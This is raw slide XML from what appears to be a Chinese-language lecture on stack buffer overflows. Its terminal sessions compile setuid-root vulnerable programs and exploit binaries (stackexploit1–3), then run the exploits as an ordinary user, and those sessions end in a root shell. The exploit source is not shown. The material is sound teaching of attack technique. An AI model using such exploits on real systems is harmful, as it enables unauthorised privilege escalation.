              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> stack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -o exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> stack]# ls -l exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-x    1 root     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        11913  5ÔÂ 24 23:38 exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> stack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> stack]# ls -l exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-x    1 root     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        11913  5ÔÂ 24 23:38 exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> stack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zhugejw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zhugejw@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> stack]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zhugejw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>zhugejw@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> stack]$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223092820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E01D8-26EB-463B-9C09-8298D2907347}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>237</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pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> vulnerable1.c -o vulnerable1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# ls -l vulnerable1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root     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>        11678  5ÔÂ 24 23:45 vulnerable1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> vulnerable1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# ls -l vulnerable1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>-x    1 root     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>        11678  5ÔÂ 24 23:45 vulnerable1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stackexploit1.c -o stackexploit1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# ls -l stackexploit1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root     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>        12455  5ÔÂ 25 09:11 stackexploit1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>zhugejw:zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stackexploit1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# ls -l stackexploit1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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>     12455  5ÔÂ 25 09:11 stackexploit1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>root@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>zhugejw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>zhugejw@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>zhugejw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>zhugejw@zhugejw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> stack]$ ./stackexploit1 400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>ret is at 0xbfffec08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> is at 0xbfffed88</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>buf's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> 0xbfffebc0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>sh-2.05b# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="900" dirty="0"/>
              <a:t>－－－－－－－－－－－如何找到返回地址？－－－－－－－－－－－－</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7950174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677BF-7D0F-4E73-8298-C5282B561703}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>238</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# gcc vulnerable2.c -o vulnerable2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# chmod u+s vulnerable2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# ls -l vulnerable2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-rwsr-xr-x    1 root     root        11670  5ÔÂ 25 09:13 vulnerable2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# gcc stackexploit2.c -o stackexploit2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-rwxr-xr-x    1 root     root        12141  5ÔÂ 25 09:15 stackexploit2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# chown zhugejw:zhugejw stackexploit2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-rwxr-xr-x    1 zhugejw  zhugejw     12141  5ÔÂ 25 09:15 stackexploit2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# su zhugejw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[zhugejw@zhugejw stack]$ ./stackexploit2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>buf's 0xbfffe350</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sh-2.05b# whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40587684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F0D2C-2A40-4507-9AFF-99EFC9D54FF6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>239</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pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# gcc stackexploit3.c -o stackexploit3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>-rwxr-xr-x    1 root     root        12216  5ÔÂ 25 09:17 stackexploit3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# chown zhugejw:zhugejw stackexploit3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>-rwxr-xr-x    1 zhugejw  zhugejw     12216  5ÔÂ 25 09:17 stackexploit3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# su zhugejw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[zhugejw@zhugejw stack]$ ./stackexploit3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>ret is at 0xbfffffb6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>buf's 0xbffff760</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
